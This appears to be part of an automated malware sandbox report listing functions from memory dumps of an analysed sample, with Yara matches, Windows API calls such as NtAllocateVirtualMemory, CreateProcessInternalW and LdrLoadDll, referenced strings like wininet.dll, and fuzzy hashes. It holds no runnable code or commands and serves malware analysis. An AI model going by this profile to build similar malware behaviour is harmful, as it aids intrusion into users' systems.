Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: eff9dc99664d90500ae57cb1470c5e57f0409f3222f2bc7d71dfdfd8a63ef6ec
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: F1F0A4B2200208ABCB14DF89DC91EEB77EDAF8C754F158248BA1D97241D630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0069A120, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00682D11,00002000,00003000,00000004), ref: 0069A159

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: f5cf8bd9ce410997abbe0e2adeb114d67a35db8449dfac9835cf66a869403f83
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 27F015B2200208ABCB14DF89CC81EAB77ADAF88750F118148BE0897241C630F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 0069A11B, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00682D11,00002000,00003000,00000004), ref: 0069A159

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 3e28440140e59e776fa14b2e23ef32520e5255d84dab29b651cc2eb786a600a1
Instruction ID: 1beb102408355c696f7be063467b7063d0532bb64e4a7f7aac8688f59283f48c
Opcode Fuzzy Hash: 3e28440140e59e776fa14b2e23ef32520e5255d84dab29b651cc2eb786a600a1
Instruction Fuzzy Hash: 3CF0A0B52001496BCF14DFA8DC84CEBBBA9BF88220F14864DF94CA7202C234E814CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 045C9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C954A

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d1b567eb456297b3c4cf4548c5fa99e458133e3054abfefd9ecea704e669b7aa
Instruction ID: 1378c4b63bba19b89d6762e32dd5f3848854db9916259e5b90746d707959ea59
Opcode Fuzzy Hash: d1b567eb456297b3c4cf4548c5fa99e458133e3054abfefd9ecea704e669b7aa
Instruction Fuzzy Hash: 4D900265291000032115A55D07045070096ABD5395751C021F1006551CD661D8657161

Uniqueness

Uniqueness Score: -1.00%

Function 045C95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C95DA

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d649fa007d5652054ec06a09fc84ca166428d3bccfd085ac4eadb302fc12d348
Instruction ID: c30ef066176dc5d58f0b183197f65d529cfb16ff52de621ad5461876882de101
Opcode Fuzzy Hash: d649fa007d5652054ec06a09fc84ca166428d3bccfd085ac4eadb302fc12d348
Instruction Fuzzy Hash: FA9002A1282000036115715D4414616405AABE0245F51C021E1005591DC565D8957165

Uniqueness

Uniqueness Score: -1.00%

Function 045C9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C965A

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f292a215174fd4f032968f09e828cb61908ba0bdc714b61acda64a3e18b20456
Instruction ID: 6f107de8178d3b2a8cfa0f468e7fc8d7530060dea108abe643a36b65c07b3640
Opcode Fuzzy Hash: f292a215174fd4f032968f09e828cb61908ba0bdc714b61acda64a3e18b20456
Instruction Fuzzy Hash: FC90027128504842F150715D4404A460065ABD0349F51C011A0055695D9665DD59B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 045C9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C966A

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f1d1c48c383f2baacdcc01131cb52cb960b12174ea0102ddf5065f4b30eef34e
Instruction ID: 21ed0b86df4bc4c6e2a1224dbcb4c6d00c000897e55d6cca7c89b9aaacf6445f
Opcode Fuzzy Hash: f1d1c48c383f2baacdcc01131cb52cb960b12174ea0102ddf5065f4b30eef34e
Instruction Fuzzy Hash: D090027128100802F190715D440464A0055ABD1345F91C015A0016655DCA55DA5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 045C96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C96DA

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a6e1d0b0667a8b0d4a9c3202a38871ec3c658874ab41fcbc27b1808e95ebcff3
Instruction ID: 344f4862e266c09336cc6c6409f27a7f242cb6df2d44d6e14f7bedfdd35118a7
Opcode Fuzzy Hash: a6e1d0b0667a8b0d4a9c3202a38871ec3c658874ab41fcbc27b1808e95ebcff3
Instruction Fuzzy Hash: FD90027128100842F110615D4404B460055ABE0345F51C016A0115655D8655D8557561

Uniqueness

Uniqueness Score: -1.00%

Function 045C96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C96EA

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3856e5bfe8d061e780ae389cbae25e14388656e2cca1fc65d59cdfb67f0f2f7d
Instruction ID: a8df5bf45ed850242cb8e87f4eac8524afb24262160c670e868c05278f241883
Opcode Fuzzy Hash: 3856e5bfe8d061e780ae389cbae25e14388656e2cca1fc65d59cdfb67f0f2f7d
Instruction Fuzzy Hash: 7C90027128108802F120615D840474A0055ABD0345F55C411A4415659D86D5D8957161

Uniqueness

Uniqueness Score: -1.00%

Function 045C9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C971A

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0a8776b651fc3a3e3e588426aef09ce07876fdaf061893dc6349e9c9c1d0eedd
Instruction ID: 0d79cfe548bc9769c0042d0beaa9baefc3dac8c547dc8380603e82d02d2aecc3
Opcode Fuzzy Hash: 0a8776b651fc3a3e3e588426aef09ce07876fdaf061893dc6349e9c9c1d0eedd
Instruction Fuzzy Hash: A590027128100402F110659D54086460055ABE0345F51D011A5015556EC6A5D8957171

Uniqueness

Uniqueness Score: -1.00%

Function 045C9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C9FEA

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f4c6aae166abb4aa9d62c77798228dba92db7e34ddbfbbdb0723bce2d3ff49bf
Instruction ID: c09084bf739df3fc4d0334ab2c881e4756234e951e4d892e2c17bd0dd7e3992c
Opcode Fuzzy Hash: f4c6aae166abb4aa9d62c77798228dba92db7e34ddbfbbdb0723bce2d3ff49bf
Instruction Fuzzy Hash: 7A90027139114402F120615D84047060055ABD1245F51C411A0815559D86D5D8957162

Uniqueness

Uniqueness Score: -1.00%

Function 045C9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C978A

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b2e77e58497389a3548e50070291c7cec2f289ac9c7a92d9b294bca3ec375654
Instruction ID: b3170c45fadf179fad16bdba41a9dfbb7913112525e7e8bcc0dec4c88b365795
Opcode Fuzzy Hash: b2e77e58497389a3548e50070291c7cec2f289ac9c7a92d9b294bca3ec375654
Instruction Fuzzy Hash: 9190026929300002F190715D540860A0055ABD1246F91D415A0006559CC955D86D7361

Uniqueness

Uniqueness Score: -1.00%

Function 045C9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C984A

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bcf7f767c90850c6fe5ea6c3da68c611e1c573b4d3f171c801e1911e4bf518b0
Instruction ID: 944a2c1aad5046b1258b9d1f33841f752d1cf28fc49358ad57ac68086b52b0be
Opcode Fuzzy Hash: bcf7f767c90850c6fe5ea6c3da68c611e1c573b4d3f171c801e1911e4bf518b0
Instruction Fuzzy Hash: 3D9002612C2041527555B15D44045074056BBE0285B91C012A1405951C8566E85AF661

Uniqueness

Uniqueness Score: -1.00%

Function 045C9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C986A

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee5ebf659001dea02fd6439480f52a33c7cd615c23c78c4080a6bb69708ca13a
Instruction ID: c18b6c9460213f45d3dec6060d402ea4a7f6520008163c71abee5f9a6bb41351
Opcode Fuzzy Hash: ee5ebf659001dea02fd6439480f52a33c7cd615c23c78c4080a6bb69708ca13a
Instruction Fuzzy Hash: 2890027128100413F121615D45047070059ABD0285F91C412A0415559D9696D956B161

Uniqueness

Uniqueness Score: -1.00%

Function 045C9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C991A

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e1e0e502e483b66425731212d47ead764ba89ed1247bd4e975f0ce7401b20030
Instruction ID: 80ba37fefee186b7d256868a8cccfb382756e347a9e3656f8c7a662933d18b6a
Opcode Fuzzy Hash: e1e0e502e483b66425731212d47ead764ba89ed1247bd4e975f0ce7401b20030
Instruction Fuzzy Hash: CD9002B128100402F150715D44047460055ABD0345F51C011A5055555E8699DDD976A5

Uniqueness

Uniqueness Score: -1.00%

Function 045C99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C99AA

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 51b3321488ce524d974c0cc7097024d803d19a0d7c69937e557b17ae820e8ec4
Instruction ID: 565f99832bd9ea70efa6e4f4d506080589d61996f2d184742f05790fca5f88f9
Opcode Fuzzy Hash: 51b3321488ce524d974c0cc7097024d803d19a0d7c69937e557b17ae820e8ec4
Instruction Fuzzy Hash: BA9002A13C100442F110615D4414B060055EBE1345F51C015E1055555D8659DC567166

Uniqueness

Uniqueness Score: -1.00%

Function 045C9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C9A5A

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37041a17dcbb6dc4bd391086d2be11473516b07633e8acbf854f9d8a81d799df
Instruction ID: 78ab1a61d46c2073896a9cdb97e8d6a87dfd3d22b114ada43edbb28b3602587a
Opcode Fuzzy Hash: 37041a17dcbb6dc4bd391086d2be11473516b07633e8acbf854f9d8a81d799df
Instruction Fuzzy Hash: A990026129180042F210656D4C14B070055ABD0347F51C115A0145555CC955D8657561

Uniqueness

Uniqueness Score: -1.00%

Function 00698C60, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00698D08

Strings

net.dll, xrefs: 00698CD1, 00698D57, 00698D2F, 00698D3B, 00698D63
wininet.dll, xrefs: 00698CBE, 00698CC7

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: b204b7fcb5266d5a91c63fbdc75ed04d5a7fa74b3efdd73d1c176b90b568dad5
Instruction ID: 74518f49288ea40959bace4d8b2212743641777116be425c3bb2d1773f036b22
Opcode Fuzzy Hash: b204b7fcb5266d5a91c63fbdc75ed04d5a7fa74b3efdd73d1c176b90b568dad5
Instruction Fuzzy Hash: 8531A4B6500744BFCB24DF64D885FA7B7BDBF48700F10811DF6299B681DA31A954CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00698C5D, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 78sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00698D08

Strings

net.dll, xrefs: 00698CD1, 00698D2F, 00698D3B
wininet.dll, xrefs: 00698CBE, 00698CC7

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 02328179e75b228cc5df1f2f1eb3a2c295d97561cf5c706cc63592366adce4d2
Instruction ID: 35256a769e02ac4bcf8fd410d2e2277f7da960586b1feee2b911f690995619e6
Opcode Fuzzy Hash: 02328179e75b228cc5df1f2f1eb3a2c295d97561cf5c706cc63592366adce4d2
Instruction Fuzzy Hash: CD21B1B1500245BFCB20DF68D885FABBBB9BF58700F10811DE6299B681DB70A954CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0069A250, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00683AF8), ref: 0069A27D

Strings

.z`, xrefs: 0069A26C, 0069A278

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 26b9bc96e6640d28ee8da007ac678c1a6d126d15a8b54b0889395c5ca7b9d601
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 4FE046B1200208ABDB18EF99CC49EA777ADEF88750F018558FE085B242C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 006882EB, Relevance: 3.1, APIs: 2, Instructions: 62threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0068834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0068836B

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 494cfc23100876bbb66c0f47567b08f5ebc70c6f898c231ac1063e3bea154edb
Instruction ID: b3bcf81fe93ba4ce6ab66bcb19dc09d54116d1c60ab023c0548e9804ec37fe7f
Opcode Fuzzy Hash: 494cfc23100876bbb66c0f47567b08f5ebc70c6f898c231ac1063e3bea154edb
Instruction Fuzzy Hash: E801B9315802187BEB20B6949C03FFE775DAB40F11F554219FF04BB1C1DA94690643E5

Uniqueness

Uniqueness Score: -1.00%

Function 006882F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0068834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0068836B

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f854c52ab528575da3ed32feed5aa92cefdd0ec95e0f062333ecd1e981d0e4c5
Instruction ID: 970f0f5e5de6fa6e38fef0b374ac8a38b07dfc10fa4bb546d5e7182f39a9a6cf
Opcode Fuzzy Hash: f854c52ab528575da3ed32feed5aa92cefdd0ec95e0f062333ecd1e981d0e4c5
Instruction Fuzzy Hash: 1B01A731A802287BEB20B6949C03FFE776DAB40F51F054119FF04BB1C2EA94690657FA

Uniqueness

Uniqueness Score: -1.00%

Function 0069A3A1, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0068F1A2,0068F1A2,?,00000000,?,?), ref: 0069A3E0

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 236e08ae635a91adde4c24d153f367cf10da5670abaeefe4093d809cc41fe4f4
Instruction ID: 74cf6f4cab26003976382c5def2082cfde5c393e9717085aff200e42bb28f9ca
Opcode Fuzzy Hash: 236e08ae635a91adde4c24d153f367cf10da5670abaeefe4093d809cc41fe4f4
Instruction Fuzzy Hash: D7018CB5200214ABDB20DF99CC81EEB37AEEF88350F118559F90D97682C630A815CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 0068ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0068AD42

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 871812e978c9dc0736c26a3a947503de5d60d789a5a3397ba4c50f8434c37349
Instruction ID: 1d500b3bcd5e7205d9abe73c9c3ccd4ef5e05deaf3b033ab97d6ff4ef8104e99
Opcode Fuzzy Hash: 871812e978c9dc0736c26a3a947503de5d60d789a5a3397ba4c50f8434c37349
Instruction Fuzzy Hash: DA010CB5D4020DABDF10EAE4DD42FDEB7799B54308F004299AD0897641F671EB54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0069A2C0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0069A314

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 5fa952b00a6b550e722a432867169d30492150c974e62f8e1dcc20189bd60e29
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 1F01AFB2210108ABCB54DF89DC80EEB77EEAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00698D90, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0068F020,?,?,00000000), ref: 00698DCC

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 13e5da16e5075c13fe0497e9382e7861973bad3320e844927e8e65c5c92c8fd6
Instruction ID: 127837263ac1485d0bee738b250fa9dee8edf9779938ee1a5a2937a6ca9a7917
Opcode Fuzzy Hash: 13e5da16e5075c13fe0497e9382e7861973bad3320e844927e8e65c5c92c8fd6
Instruction Fuzzy Hash: B9E09B333803043AE7306599AC03FE7739DDB91B21F54002AF70DE76C1D995F80242A8

Uniqueness

Uniqueness Score: -1.00%

Function 0069A210, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00694506,?,00694C7F,00694C7F,?,00694506,?,?,?,?,?,00000000,00000000,?), ref: 0069A23D

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 975c8cb847e8861c2408a47e1ea1845014c49909ffac972799be18c4933fa630
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: E6E046B1200208ABDB14EF99CC41EA777ADEF88750F118558FE085B242C630F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0069A3B0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0068F1A2,0068F1A2,?,00000000,?,?), ref: 0069A3E0

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: ef770ece4a6fa1aca18b5d6aee7e588681ee870af45c2583a18c14d960d11d6f
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: A3E01AB12002086BDB10DF89CC85EE777ADAF88650F018154BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0069A3E6, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0068F1A2,0068F1A2,?,00000000,?,?), ref: 0069A3E0

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 2bdbf6788a73ba2c63300aad17d2fe3e52fa04edbd29c317fd312d895c75169b
Instruction ID: 3c7f1a1736635a85a5120e7363d5bfd13f91df95f7eb658c0874b058c0d811c0
Opcode Fuzzy Hash: 2bdbf6788a73ba2c63300aad17d2fe3e52fa04edbd29c317fd312d895c75169b
Instruction Fuzzy Hash: AAE08CB15000046BCF10EFA59C80DE777ADAF842107018254FC089B602C530E9158BF0

Uniqueness

Uniqueness Score: -1.00%

Function 0068F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00688CF4,?), ref: 0068F6CB

Memory Dump Source

Source File: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 3b8733ff40dbe60899a868be32700c17fdbd49cd30ce02c539a8a25725954d77
Instruction ID: 07e48abb94c33cefd106c37e8846ca1b25021beb98e23cf733049aecfe7f95f9
Opcode Fuzzy Hash: 3b8733ff40dbe60899a868be32700c17fdbd49cd30ce02c539a8a25725954d77
Instruction Fuzzy Hash: 30D0A7717903043BEA10FBA49C03F6632CE6B44B04F490074FA48D73C3ED50E4014165

Uniqueness

Uniqueness Score: -1.00%

Function 045C967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045C9694

Memory Dump Source

Source File: 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true

Associated: 0000000E.00000002.620140871.000000000467B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.620187411.000000000467F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 80213cf99b5206010d8619c959d3ce2b448b041f5e55e6566a464bf5d2e0a510
Instruction ID: 6007ae5d9c77c1f80409dfe5513195e5697d76bf252eec4112947c2ab634641d
Opcode Fuzzy Hash: 80213cf99b5206010d8619c959d3ce2b448b041f5e55e6566a464bf5d2e0a510
Instruction Fuzzy Hash: 06B09BB19414C5C9F711D7A4560871779507BD0745F16C055D1020645A4778D0D5F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00692A20, Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 231COMMON

Download Yara Rule

APIs

SetUserObjectSecurity.USER32 ref: 00692C6A

Strings

r, xrefs: 00692AE4
g, xrefs: 00692B2A
